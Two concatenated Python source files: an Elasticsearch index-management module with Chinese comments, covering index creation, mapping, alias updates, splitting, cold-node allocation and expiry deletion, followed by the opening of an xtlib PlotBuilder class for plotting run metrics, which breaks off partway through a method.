_alias_update(es_addr, es_auth, rt_id_lower, max_index_name)
conn_info = rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO]
shard, init_shard_size, max_shard_num, shard_docs_limit, total_shards_per_node = _get_init_shard_param(conn_info)
# 获取index 主分片数和docs
pri_shard_num, docs = _get_es_index_pri_docs(es_addr, es_auth, max_index_name)
if _index_need_splitting(max_index_name, index_size, conn_info, pri_shard_num, docs, shard_docs_limit):
new_index_name = _get_new_index_name(rt_id_lower, max_index_name)
num_shards = shard if index_size < init_shard_size else max_shard_num
mapping = _construct_mapping(rt_info, num_shards, TAG_HOT, total_shards_per_node)
logger.info(f"{es_addr}: {rt_id_lower} create index {new_index_name} with mapping {mapping}")
# 创建索引,同时挂载别名
_create_es_index_in_cluster(rt_id_lower, es_addr, es_auth, new_index_name, mapping)
# 海外版不存在冷节点,内部版有冷热节点,通过变量控制不同版本
if _get_has_cold_nodes(conn_info):
# 将过期的索引放入冷节点
cold_sort_index_list = sort_index_list[1:]
hot_index_date = util.get_date_by_diff(1 - _get_hot_save_days(conn_info)) # yyyyMMdd
for one_index in cold_sort_index_list:
# 保证当天的索引保持原样,跳过将其转到冷节点的逻辑 yyyyMMdd01
if one_index in indices_to_delete or int(hot_index_date) <= int(one_index.split("_")[-1][0:8]):
continue
else:
allocation_tag = _get_index_allocation_tag(es_addr, es_auth, one_index)
# 把索引tag属性不是cold的索引修改为cold
if allocation_tag != TAG_COLD:
logger.info(f"{es_addr}: going to move index {one_index} to cold tag")
# 设置冷节点单节点分片数
settings = {
"index.routing.allocation.include.tag": TAG_COLD,
"index.routing.allocation.total_shards_per_node": (REPLICA_NUM + 1) * max_shard_num,
}
_put_index_settings(es_addr, es_auth, one_index, settings)
def _create_es_index_in_cluster(rt, es_addr, es_auth, index_name, index_mapping_str):
"""
在es集群中创建索引
:param rt: rt名称
:param es_addr: es集群地址
:param es_auth: es集群鉴权
:param index_name: 索引名称
:param index_mapping_str: 索引的mapping
:return: 是否创建成功
"""
res = requests.put(
url=f"http://{es_addr}/{index_name}?master_timeout=240s",
json=json.loads(index_mapping_str),
headers=JSON_HEADERS,
auth=es_auth,
timeout=600,
)
if res.status_code == 200:
alias = rt.lower()
# TODO 需要校验索引已经存在了,能被rest接口查询到
if _alias_update(es_addr, es_auth, alias, index_name):
# alias更新是异步操作,这里需要验证alias真的已经指向到新的index上,最多等待90s
reties = 15
while not _is_alias_point_to_index(es_addr, es_auth, alias, index_name) and reties > 0:
time.sleep(6)
reties -= 1
if reties == 0:
_delete_index(es_addr, es_auth, index_name)
logger.warning(f"{es_addr}: update alias timeout for {rt}, delete the index {index_name}")
else:
logger.info(f"{es_addr}: create index {index_name} and update alias success for {rt}")
return True
else:
_delete_index(es_addr, es_auth, index_name)
logger.warning(f"{es_addr}: update alias failed for {rt}, delete the index {index_name}")
else:
# 创建es mapping失败,需要告警出来
msg = f"{es_addr}: failed to create index {index_name} for {rt}. {res.status_code} {res.text}"
logger.warning(msg)
util.wechat_msg(RTX_RECEIVER, msg)
return False
def _alias_update(es_addr, es_auth, alias, max_index_name):
"""
获取别名(rt)指向的index名称和当日alias指向的index名称,如果和传入的索引相同,则无需修改别名
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param alias: es索引的默认别名
:param max_index_name: 当前最大的索引名称
:return: 更新别名的结果,True/False
"""
today = alias + "_" + util.get_date_by_diff(0)
tomorrow = alias + "_" + util.get_date_by_diff(1)
near_tomorrow = util.is_near_tomorrow()
# 如果时间接近明天,则增加明天的日期作为别名
if near_tomorrow:
alias_ret = requests.get(
url=f"http://{es_addr}/_alias/{alias},{today},{tomorrow}",
auth=es_auth,
timeout=HTTP_REQUEST_TIMEOUT,
)
else:
alias_ret = requests.get(
url=f"http://{es_addr}/_alias/{alias},{today}", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT
)
action = {ACTIONS: []}
# 判断当前索引的别名,增加缺失的别名
if alias_ret.status_code == 200 and max_index_name in alias_ret.json():
alias_list = list(alias_ret.json()[max_index_name]["aliases"].keys())
if alias not in alias_list:
action[ACTIONS].append({REMOVE: {INDEX: f"{alias}_20*", ALIAS: alias}})
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: alias}})
if today not in alias_list:
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: today}})
if near_tomorrow and tomorrow not in alias_list:
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: tomorrow}})
else:
action[ACTIONS].append({REMOVE: {INDEX: f"{alias}_20*", ALIAS: alias}})
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: alias}})
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: today}})
if near_tomorrow:
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: tomorrow}})
if action[ACTIONS]:
action = json.dumps(action)
logger.info(f"{es_addr}: change alias for {max_index_name} {action}")
# 修改别名的指向,原子操作
res = requests.post(
url=f"http://{es_addr}/_aliases?master_timeout=240s",
data=action,
headers=JSON_HEADERS,
auth=es_auth,
timeout=600,
)
if res.status_code != 200:
logger.warning(f"{es_addr}: change alias failed {action}. {res.status_code} {res.text}")
return False
return True
def _is_alias_point_to_index(es_addr, es_auth, alias, index_name):
"""
验证es中的别名是否指向指定的索引,返回验证结果
:param es_addr: es集群地址
:param es_auth: es权限校验信息
:param alias: 索引的别名
:param index_name: 索引名称
:return: True/False
"""
res = requests.get(url=f"http://{es_addr}/_alias/{alias}", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
# 首先验证返回的结果中只包含一个key,然后验证key的值和索引名称相同,此时能确定alias指向了index,且唯一
if res.status_code == 200:
result = res.json()
if len(result) == 1 and index_name in result:
return True
logger.warning(f"{es_addr}: alias {alias} is not point to index {index_name}. {res.status_code}, {res.text}")
return False
def _delete_index(es_addr, es_auth, indices):
"""
删除es集群中的指定索引
:param es_addr: es集群地址
:param es_auth: es权限校验信息
:param indices: 索引名称,多个索引用逗号串起来
:return: 删除成功与否,True/False
"""
res = requests.delete(f"http://{es_addr}/{indices}", auth=es_auth, timeout=600)
if res.status_code == 200:
return True
else:
logger.warning(f"{es_addr}: failed to delete indices {indices}. {res.status_code} {res.text}")
return False
def _get_valid_rt_indices(indices):
"""
在输入的索引列表中找到合法的rt和rt对应的索引列表(倒序,最新时间的索引名称在前)。
:param indices: 索引名称列表
:return: 元组,第一个是rt和对应的索引列表的字典,第二个是不合法的索引列表
"""
rt_sort_index_list = {}
bad_indices = []
for index_name in indices:
# 符合要求的索引 611_etl_docker_2018070700 ,包含rtid + _ + yyyyMMdd + xx (xx编号可有可无,默认00)
if re.search(r"^\d+_\w+_\d{8,}$", index_name) is None:
# 不符合要求的es索引名称,不是es入库所使用的索引
skip = False
for prefix in SKIP_ES_INDEX_PREFIX:
if index_name.startswith(prefix):
skip = True
break
if not skip:
bad_indices.append(index_name)
else:
rt = "_".join(index_name.split("_")[0:-1])
if rt not in rt_sort_index_list:
rt_sort_index_list[rt] = [index_name]
else:
rt_sort_index_list[rt].append(index_name)
for index_name_list in list(rt_sort_index_list.values()):
index_name_list.sort(reverse=True)
return rt_sort_index_list, bad_indices
def _get_es_indices(es_addr, es_auth, index_prefix=""):
"""
获取es集群中符合匹配规则的所有正常的索引列表,不包含状态为closed的索引。
:param es_addr: es集群地址
:param es_auth: es集群的鉴权信息
:param index_prefix: 检索的es索引的前缀,默认为空字符串
:return: es集群中正常的索引列表
"""
res = requests.get(
f"http://{es_addr}/_cat/indices?h=index,status&format=json&index={index_prefix}*",
auth=es_auth,
timeout=HTTP_REQUEST_TIMEOUT,
)
indices = []
not_open_indices = []
if res.status_code == 200:
for item in res.json():
if item[STATUS] == "open":
indices.append(item[INDEX])
else:
not_open_indices.append(item[INDEX])
else:
logger.warning(f"{es_addr}: get indices list failed. {res.status_code} {res.text}")
if not_open_indices:
logger.info(f"{es_addr}: not open indices are {json.dumps(not_open_indices)}")
return indices
def _get_es_index_pri_docs(es_addr, es_auth, index_name):
"""
获取es集群中索引的docs。
:param es_addr: es集群地址
:param es_auth: es集群的鉴权信息
:param index_name: 索引名称
:return: es集群中索引的docs。
"""
res = requests.get(
f"http://{es_addr}/_cat/indices/{index_name}?v&s=index&format=json",
auth=es_auth,
timeout=HTTP_REQUEST_TIMEOUT,
)
docs = 0
pri_shard_num = 0
if res.status_code == 200 and res.json():
docs = int(res.json()[0]["docs.count"])
pri_shard_num = int(res.json()[0]["pri"])
else:
logger.warning(f"{es_addr}: get index docs failed. {res.status_code} {res.text}")
return pri_shard_num, docs
def _trans_fields_to_es_conf(fields, es_storage_conf):
"""
将rt的字段转换为es中的字段和类型
:param fields: rt中的字段列表
:param es_storage_conf: rt的es相关存储配置
:return: es中的mapping相关配置
"""
# 页面上配置支持分词字段、聚合字段、json字段三种配置。时间字段为默认的,用户不可配置。
result_conf = {
ANALYZED_FIELDS: [],
DATE_FIELDS: [DTEVENTTIMESTAMP], # 时间字段用户不可配置
DOC_VALUES_FIELDS: [DTEVENTTIMESTAMP], # 时间戳固定作为聚合字段
JSON_FIELDS: [],
}
# 默认删除rt中的timestamp/offset字段,增加_iteration_idx字段,将字段映射为es中的字段配置
for field in fields:
field_name = field[FIELD_NAME]
if field_name not in SKIP_RT_FIELDS:
# TODO analyzed_fields(分词) 和 doc_values_fields(聚合) 应该互斥,keyword支持聚合,text不支持
if ANALYZED_FIELDS in es_storage_conf and field_name in es_storage_conf[ANALYZED_FIELDS]:
result_conf[ANALYZED_FIELDS].append(field_name)
if JSON_FIELDS in es_storage_conf and field_name in es_storage_conf[JSON_FIELDS]:
result_conf[JSON_FIELDS].append(field_name)
if (
field_name != DTEVENTTIMESTAMP
and DOC_VALUES_FIELDS in es_storage_conf
and field_name in es_storage_conf[DOC_VALUES_FIELDS]
):
result_conf[DOC_VALUES_FIELDS].append(field_name)
# TODO 兼容旧逻辑中将几个字段默认作为聚合字段的逻辑,后续需全部迁移到es的存储配置中
for field_name in AUTO_CREATE_FIELD:
if field_name not in result_conf[DOC_VALUES_FIELDS]:
result_conf[DOC_VALUES_FIELDS].append(field_name)
return result_conf
def _trans_mapping_to_es_conf(es_mapping, es_version):
"""
将es索引的mapping转换为es存储的配置,以便于和rt的es存储配置对比。
:param es_mapping: es索引的mapping,json对象
:return: 索引的mapping转换的es存储的配置对象
"""
result_conf = {ANALYZED_FIELDS: [], DATE_FIELDS: [], DOC_VALUES_FIELDS: [], JSON_FIELDS: []}
for field_name, value in list(es_mapping[PROPERTIES].items()):
if field_name == "_copy" and _extract_big_version(es_version) >= 6:
# 跳过6.x版本中默认添加的_copy字段,此字段功能类似以前版本的_all字段
continue
if PROPERTIES in value or value[TYPE] == OBJECT:
# json格式的字段无法分词,也无法聚合
result_conf[JSON_FIELDS].append(field_name)
continue
if value[TYPE] == TEXT:
# text字段即为分词的字段,无法用作聚合
result_conf[ANALYZED_FIELDS].append(field_name)
else:
if DOC_VALUES not in value:
# doc_values默认值为true,只有显示设置为false的时候,才会在mapping中体现
result_conf[DOC_VALUES_FIELDS].append(field_name)
if value[TYPE] == DATE:
result_conf[DATE_FIELDS].append(field_name)
# TODO 兼容旧逻辑中将几个字段默认作为聚合字段的逻辑,后续需全部迁移到es的存储配置中
for field_name in AUTO_CREATE_FIELD:
if field_name not in result_conf[DOC_VALUES_FIELDS]:
result_conf[DOC_VALUES_FIELDS].append(field_name)
return result_conf
def _is_schema_changed(rt_info, json_mapping):
"""
根据rt的es存储配置计算es的mapping内容,和实际es集群中此rt对应的索引的mapping进行对比,返回对比结果
:param rt_info: rt的配置
:param json_mapping: rt对应es中索引的mapping
:return: 是否rt对应的mapping发生了变化,True/False
"""
config_from_api = json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG])
rt_es_config = _trans_fields_to_es_conf(rt_info[FIELDS], config_from_api)
# from ES
version = rt_info[STORAGES][ES][STORAGE_CLUSTER][VERSION]
index_type = rt_info[RESULT_TABLE_NAME].lower() # index_type即为rt的result_table_name字段
properties = json_mapping if _extract_big_version(version) >= 7 else json_mapping[index_type]
es_config = _trans_mapping_to_es_conf(properties, version)
result = not _is_subset(rt_es_config, es_config)
logger.info(
f"{rt_info[RESULT_TABLE_ID]} es storage config changed is {result}. from rt conf/from es "
f"index: {json.dumps(rt_es_config)}, {json.dumps(es_config)}"
)
return result
def _is_replica_changed(rt_info, current_replica):
"""
根据rt的es存储配置中副本设置和实际索引中副本设置进行对比,返回是否副本设置相同
:param rt_info: rt的配置
:param current_replica: 当前索引的副本数量
:return: 是否rt对应的副本设置发生了变化,True/False
"""
config_from_api = json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG])
num_replica = _get_replica_num(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO], config_from_api)
return num_replica != current_replica
def _get_replica_num(conn_info, es_conf):
"""
根据rt的es存储配置,以及配置文件中的配置,返回es存储的副本数
:param conn_info: es集群配置
:param es_conf: es配置项
:return: es存储的副本数
"""
conn = json.loads(conn_info)
num_replica = 0
if (
ENABLE_REPLICA in conn
and type(conn[ENABLE_REPLICA]) == bool
and conn[ENABLE_REPLICA]
and HAS_REPLICA in es_conf
and type(es_conf[HAS_REPLICA]) == bool
and es_conf[HAS_REPLICA]
):
# 当集群配置了启用副本,且rt的存储配置上指定了副本时,设定索引的副本数
num_replica = REPLICA_NUM
return num_replica
def _construct_mapping(rt_info, num_shard, index_tag, total_shards_per_node=TOTAL_SHARDS_PER_NODE):
"""
构造rt对应的es索引的mapping
:param rt_info: rt的配置
:param num_shard: es索引的分片数
:param index_tag: es索引的tag
:param total_shards_per_node: es索引单节点最大分片数
:return: rt对应的es索引的mapping字符串
"""
config_from_api = json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG])
num_replica = _get_replica_num(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO], config_from_api)
rt_es_config = _trans_fields_to_es_conf(rt_info[FIELDS], config_from_api)
version = rt_info[STORAGES][ES][STORAGE_CLUSTER][VERSION]
# ES 6.x使用的字段
copy_to_field_name = "_copy"
mapping_field_dict = {}
rt_field_dict = {}
for field_name, field_type in list(_trans_rt_fields(rt_info[FIELDS]).items()):
rt_field_dict[field_name] = field_type
mapping_dict_value = {}
if _extract_big_version(version) < 6:
mapping_dict_value[INCLUDE_IN_ALL] = FALSE
# 分词字段、json字段、聚合字段存在互斥关系
if field_name in rt_es_config[ANALYZED_FIELDS]:
mapping_dict_value[TYPE] = TEXT
mapping_dict_value[DOC_VALUES] = FALSE
if _extract_big_version(version) >= 6:
mapping_dict_value["copy_to"] = copy_to_field_name
else:
mapping_dict_value[INCLUDE_IN_ALL] = TRUE
elif field_name in rt_es_config[JSON_FIELDS]:
mapping_dict_value[TYPE] = OBJECT
elif field_name in rt_es_config[DOC_VALUES_FIELDS]:
mapping_dict_value[TYPE] = _convert_to_es_type(field_type)
else:
# 普通字段,设置为非聚合
mapping_dict_value[TYPE] = _convert_to_es_type(field_type)
mapping_dict_value[DOC_VALUES] = FALSE
# 处理时间字段
if field_name in rt_es_config[DATE_FIELDS]:
mapping_dict_value[TYPE] = DATE
mapping_dict_value["format"] = (
"yyyy-MM-dd HH:mm:ss"
if field_name == DTEVENTTIME
else "epoch_millis"
if field_name == DTEVENTTIMESTAMP
else "strict_date_optional_time||yyyy-MM-dd HH:mm:ss||epoch_millis"
)
# 添加到mapping中
mapping_field_dict[field_name] = mapping_dict_value
logger.info(
f"{rt_info[RESULT_TABLE_ID]}: rt fields {json.dumps(rt_field_dict)}, "
f"mapping fields {json.dumps(mapping_field_dict)}"
)
index_type = rt_info[RESULT_TABLE_NAME].lower() # index_type即为rt的result_table_name字段
# 单节点最大分片数据,当存在副本且数据量很小时,可能存在分片比较集中的情况,但是默认只有3个分片而已。
# 对于大索引,必须要求最大分片数超过或者等于热节点数(否则,当存在副本情况下,可能无法分配分片),且单个节点索引最大分片数为默认分片数的副本数倍数
# total_shards_per_node 默认为2,避免节点故障无法分配分片
index_mapping = {SETTINGS: {INDEX: {"number_of_shards": f"{num_shard}", NUMBER_OF_REPLICAS: f"{num_replica}"}}}
if NODE_HAS_TAG:
index_mapping[SETTINGS][INDEX][ROUTING] = {ALLOCATION: {INCLUDE: {TAG: f"{index_tag}"}}}
# 只在内部版开启
if RUN_VERSION == VERSION_IEOD_NAME:
index_mapping[SETTINGS][INDEX][ROUTING][ALLOCATION]["total_shards_per_node"] = (
total_shards_per_node + num_replica
)
dynamic_templates = [
{"strings_as_keywords": {"match_mapping_type": STRING, "mapping": {"norms": FALSE, TYPE: KEYWORD}}}
]
if _extract_big_version(version) >= 7:
index_mapping[MAPPINGS] = {"dynamic_templates": dynamic_templates}
else:
index_mapping[MAPPINGS] = {f"{index_type}": {"dynamic_templates": dynamic_templates}}
# 对于6.x版本的es,其mapping和旧版本(多数为5.x)不一样
if _extract_big_version(version) >= 6:
mapping_field_dict[copy_to_field_name] = {TYPE: TEXT}
else:
index_mapping[MAPPINGS][index_type]["_all"] = {"enabled": TRUE}
if _extract_big_version(version) >= 7:
index_mapping[MAPPINGS][PROPERTIES] = mapping_field_dict
else:
index_mapping[MAPPINGS][index_type][PROPERTIES] = mapping_field_dict
return json.dumps(index_mapping)
def _get_index_mapping_from_es(es_addr, es_auth, index):
"""
获取es中索引的mapping信息
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: es索引的mapping信息
"""
res = requests.get(f"http://{es_addr}/{index}/_mappings", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
return res.json()[index][MAPPINGS]
else:
logger.warning(f"{es_addr}: get index {index} mappings failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def _get_index_settings_from_es(es_addr, es_auth, index):
"""
获取es索引的settings设置
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: es索引的settings设置
"""
res = requests.get(f"http://{es_addr}/{index}/_settings", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
return res.json()
else:
logger.warning(f"{es_addr}: get index {index} settings failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def _get_sample_data_from_es(es_addr, es_auth, index):
"""
从指定索引中查找最新的十条数据并返回
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: es索引中的最新十条数据
"""
res = requests.post(
f"http://{es_addr}/{index}/_search/",
auth=es_auth,
headers=JSON_HEADERS,
data=json.dumps({"sort": [{DTEVENTTIMESTAMP: {ORDER: "desc"}}], "from": 0, "size": 10}),
)
if res.status_code == 200:
return res.json()
else:
logger.warning(f"{es_addr}: query index {index} failed. {res.status_code} {res.text}")
return {}
def _is_subset(small_conf_dict, big_conf_dict):
"""
判断一个配置集是否为另一个配置集的子集,如果是,返回True,否则返回False
:param small_conf_dict: 较小的配置集对象
:param big_conf_dict: 较大的配置集对象
:return: True/False
"""
for key, value_list in list(small_conf_dict.items()):
if key not in list(big_conf_dict.keys()):
return False
else:
for value in value_list:
if value not in big_conf_dict[key]:
return False
return True
def _get_new_index_name(rt, max_index_name=None):
"""
构造es中rt对应的最新索引名称
:param rt: result table id
:param max_index_name: es中此rt对应的最大的索引名称
:return: rt最新的索引名称
"""
today = util.get_date_by_diff(0) # in case of 20180132 -> 20180201
index_name = f"{rt}_{today}00" # 默认索引名称为rt + _ + 当前日期 + 00
if max_index_name:
index_date_num = max_index_name.split("_")[-1]
if today in index_date_num: # 当前最大的索引名称为当天创建的,则在最后两位上加一
index_name = f"{rt}_{int(index_date_num) + 1}"
return index_name.lower() # es 中索引只能是小写字符
def _trans_rt_fields(fields):
"""
将rt的字段列表转换为在es中的字段列表
:param fields: rt的字段列表
:return: es中的字段列表,包含字段名称和类型
"""
result = {DTEVENTTIMESTAMP: DATE}
for field in fields:
if field[FIELD_NAME] not in SKIP_RT_FIELDS:
result[field[FIELD_NAME]] = field[FIELD_TYPE]
return result
def _convert_to_es_type(field_type):
"""
将rt的字段类型映射为es中的数据类型
:param field_type: rt的字段类型
:return: es中的数据类型
"""
if INT == field_type:
return INTEGER
elif field_type in [LONG, FLOAT, DOUBLE]:
return field_type
else:
return KEYWORD
def _expired_index_list(result_table_id, expires, index_name_list):
"""
从index列表中获取待删除的index,这里要列表类似[rt_2019061400, rt_2019060600, rt_2019052900],其中0529存储的
是0529~0606的数据,清理时需要0606达到过期时间,并删除0529,不能看到0529已到清理时间就直接清除掉。
:param result_table_id: rt的id
:param expires: rt的过期时间配置
:param index_name_list: rt的索引列表,倒序排列。
:return: 需要删除的索引的列表
"""
expired_index_name_list = []
length = len(index_name_list)
days = util.translate_expires_day(expires)
if length <= RESERVED_INDEX_NUM or days <= 0:
return expired_index_name_list
expired_date = int(util.get_date_by_diff(-days))
suffix_idx = len(result_table_id) + 1
for i in range(length):
# 截取索引名中尾部的时间那一段(591_etl_abc_2018090202 -> 2018090902,这里有可能最后一段是0)
date_suffix = index_name_list[i][suffix_idx:]
if len(date_suffix) < 8:
# 不合法的索引名称
expired_index_name_list.append(index_name_list[i])
elif int(date_suffix[0:8]) < expired_date:
# idx代表第一个创建日期小于expired_date的index的下标位置加1,即开始删除的位置
idx = max(i + 1, RESERVED_INDEX_NUM)
expired_index_name_list.extend(index_name_list[idx:])
break
logger.debug(f"{result_table_id}: indices expired are {json.dumps(expired_index_name_list)}")
return expired_index_name_list
def _index_need_splitting(index, index_size, connection_info, pri_shard_num, docs, shard_docs_limit):
"""
获取是否需要强制分裂当前的索引
现在的分裂条件判断过程:
1)index 为空不分裂
2)docs数超出限制,分裂
3)字节总量index size超过限制,分裂
4)index不为空,且超出分裂日期,分裂
5) 其他情况不分裂
:param index: 索引名称
:param index_size: 索引的字节数
:param connection_info: 连接信息
:param pri_shard_num: 主分片数据
:param docs: index docs
:param shard_docs_limit: 单分片docs限制
:return: 是否需要分裂索引
"""
if docs == 0:
return False
index_split_threshold_in_byte, force_split_days = _get_split_index_condition(connection_info)
index_date = int(index.split("_")[-1][0:8])
force_split_date = int(util.get_date_by_diff(-force_split_days))
if (
docs >= pri_shard_num * shard_docs_limit
or index_size >= index_split_threshold_in_byte
or force_split_date >= index_date
):
return True
return False
def _get_index_size(es_addr, es_auth, index):
"""
获取当前索引的字节数
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: 索引包含的字节数
"""
res = requests.get(f"http://{es_addr}/{index}/_stats/store", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
try:
return res.json()[INDICES][index]["primaries"]["store"]["size_in_bytes"]
except Exception:
logger.info(f"{es_addr}: failed to get index {index} size. ", exc_info=True)
else:
logger.warning(f"{es_addr}: failed to get {index} stats. {res.status_code} {res.text}")
return 0
def _get_index_allocation_tag(es_addr, es_auth, index):
"""
获取es索引中allocation tag配置项的值
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: allocatoin tag的值
"""
tag = TAG_HOT # 假定获取失败时,使用热节点的tag
es_settings = _get_index_settings_from_es(es_addr, es_auth, index)
try:
tag = es_settings[index][SETTINGS][INDEX][ROUTING][ALLOCATION][INCLUDE][TAG]
except Exception:
logger.error(
f"{es_addr}: failed to get {index} allocation tag from settings {json.dumps(es_settings)}.",
exc_info=True,
)
return tag
def _get_index_replica(es_addr, es_auth, index):
"""
获取es索引中number_of_replicas配置项的值
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: number_of_replicas的值
"""
replica = REPLICA_NUM # 假定获取失败时,使用默认副本设置
es_settings = _get_index_settings_from_es(es_addr, es_auth, index)
try:
replica = int(es_settings[index][SETTINGS][INDEX][NUMBER_OF_REPLICAS])
except Exception:
logger.error(
f"{es_addr}: failed to get {index} number_of_replicas from settings {json.dumps(es_settings)}.",
exc_info=True,
)
return replica
def _put_index_settings(es_addr, es_auth, index, put_dict):
"""
更新es索引的settings中配置项
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:param put_dict: 更新的配置项字典
"""
url = f"http://{es_addr}/{index}/_settings?master_timeout=240s"
res = requests.put(url, data=json.dumps(put_dict), headers=JSON_HEADERS, auth=es_auth, timeout=600)
if res.status_code != 200:
logger.warning(f"{es_addr}: failed to update index {index} settings {put_dict}. {res.status_code} {res.text}")
def _extract_big_version(version):
"""
从给定的version中抽取大版本号,如:7.4.2 -> 7
:param version: 完整的版本号
:return: 数字类型的大版本号
"""
return int(version.split(".")[0])
def route_es_request(uri, cluster_name):
"""
:param uri: 请求相对路径
:param cluster_name: 集群名称
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, ES)
if not cluster:
raise ClusterNotFoundException(message_kv={CLUSTER_TYPE: ES, CLUSTER_NAME: cluster_name})
es_addr, es_auth = parse_es_connection_info(cluster.connection_info)
url = f"http://{es_addr}/{uri}"
res = requests.get(url=url, auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
logger.info(f"route es request, url: {url}, status: {res.status_code}")
if res.status_code == 200:
return res.text
else:
logger.warning(f"{es_addr}: route es request failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def cat_indices(cluster_name, limit):
"""
:param cluster_name: 集群名称
:param limit: 结果表限制数
"""
es_addr, es_auth = es_conn_info(cluster_name)
url = f"http://{es_addr}/_cat/indices?v&s={STORE_SIZE}:desc&format=json&master_timeout=300s"
res = requests.get(url=url, auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
logger.info(f"cat indices request, url: {url}, status: {res.status_code}")
result = {TOP: [], INDICES: []}
if res.status_code == 200:
indices_list = res.json()
result[INDICES] = indices_list
# 过滤出大于条数阀值的rt列表,过滤掉非法index
filter_indices = [s for s in indices_list if re.search(r"^\d+_\w+_\d{8,}$", s[INDEX]) is not None]
range_index = len(filter_indices) if limit > len(filter_indices) else limit
result[TOP] = [filter_indices[i][INDEX] for i in range(range_index)]
return result
else:
logger.warning(f"{es_addr}: cat indices request failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def del_indices(cluster_name, indices):
"""
:param cluster_name: 集群名称
:param indices: 索引列表,支持通配符
"""
es_addr, es_auth = es_conn_info(cluster_name)
index_list = indices.split(",")
error_list = []
success_list = []
for index in index_list:
url = f"http://{es_addr}/{index}?master_timeout=300s"
try:
res = requests.delete(url=url, auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
logger.info(f"del indices request, url: {url}, status: {res.status_code}")
if res.status_code == 200:
success_list.append(index)
else:
logger.error(f"{es_addr}: {index}: failed to del indices for {res.text}")
error_list.append(index)
except Exception:
error_list.append(index)
logger.error(f"{es_addr}: {index}: del indices exception.", exc_info=True)
return {SUCCESS: success_list, FAILED: error_list}
def es_conn_info(cluster_name):
"""
获取es连接信息
:param cluster_name: 集群名称
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, ES)
if not cluster:
raise ClusterNotFoundException(message_kv={CLUSTER_TYPE: ES, CLUSTER_NAME: cluster_name})
es_addr, es_auth = parse_es_connection_info(cluster.connection_info)
return es_addr, es_auth
|
plot_builder.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
#
# self.py: functions to help produce plots of metrics from runs
import math
import time
import numpy as np
import pandas as pd
from xtlib import qfe
from xtlib import utils
from xtlib import errors
from xtlib import console
from xtlib import constants
from xtlib import run_helper
PRESMOOTH = "_PRE-SMOOTH_"
ERR = "_ERR_"
MEAN = "_MEAN_"
MIN = "_MIN_"
MAX = "_MAX_"
class PlotBuilder():
def __init__(self, run_names, col_names, x_col, layout, break_on, title, show_legend, plot_titles,
legend_titles, smoothing_factor, plot_type, timeout,
aggregate, shadow_type, shadow_alpha, run_log_records, style, show_toolbar, max_runs, max_traces,
group_by, error_bars, show_plot, save_to, x_label, colors, color_map, color_steps, legend_args, plot_args):
self.run_names = run_names
self.col_names = col_names
self.x_col = x_col
self.layout = layout
self.break_on = break_on
self.title = title
self.show_legend = show_legend
self.plot_titles = plot_titles
self.legend_titles = legend_titles
self.smoothing_factor = smoothing_factor
self.plot_type = plot_type
self.timeout = timeout
self.aggregate = utils.zap_none(aggregate)
self.shadow_type = utils.zap_none(shadow_type)
self.shadow_alpha = shadow_alpha
self.run_log_records = run_log_records
self.style = utils.zap_none(style)
self.show_toolbar = show_toolbar
self.max_runs = max_runs
self.max_traces = max_traces
self.group_by = group_by if group_by else "run"
self.error_bars = utils.zap_none(error_bars)
self.show_plot = show_plot
self.save_to = save_to
self.x_label = x_label
self.legend_args = legend_args
self.plot_args = plot_args
if colors:
self.colors = colors
else:
if not color_map:
color_map = "cycle"
self.colors = self.get_colors(color_map, color_steps)
def get_colors(self, color_map_name, steps):
from matplotlib import cm
if color_map_name == "cycle":
# matplotlab default colors (V2.0, category10 color palette)
colors = \
['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
else:
color_map = cm.get_cmap(color_map_name)
colors = color_map( np.linspace(0, 1, steps) )
return colors
def build(self):
data_frames_by_cols = self.build_data_frames()
if data_frames_by_cols:
for cols, dfx in data_frames_by_cols.items():
dfx = self.pre_preprocess_data_frame(dfx)
data_frames_by_cols[cols] = dfx
# this check is to enable faster testing
if self.show_plot or self.save_to:
self.plot_data(data_frames_by_cols)
def build_data_frames(self):
'''
1. for each run, collect the reported metrics as metric sets (by reported col list)
2. append to the dataframe for that col list
'''
# build "data_frames"
no_metrics = []
pp_run_names = []
used_max = False
data_frames_by_cols = {}
got_columns = False
for i, record in enumerate(self.run_log_records):
# extract metrics for this run
run = record["_id"]
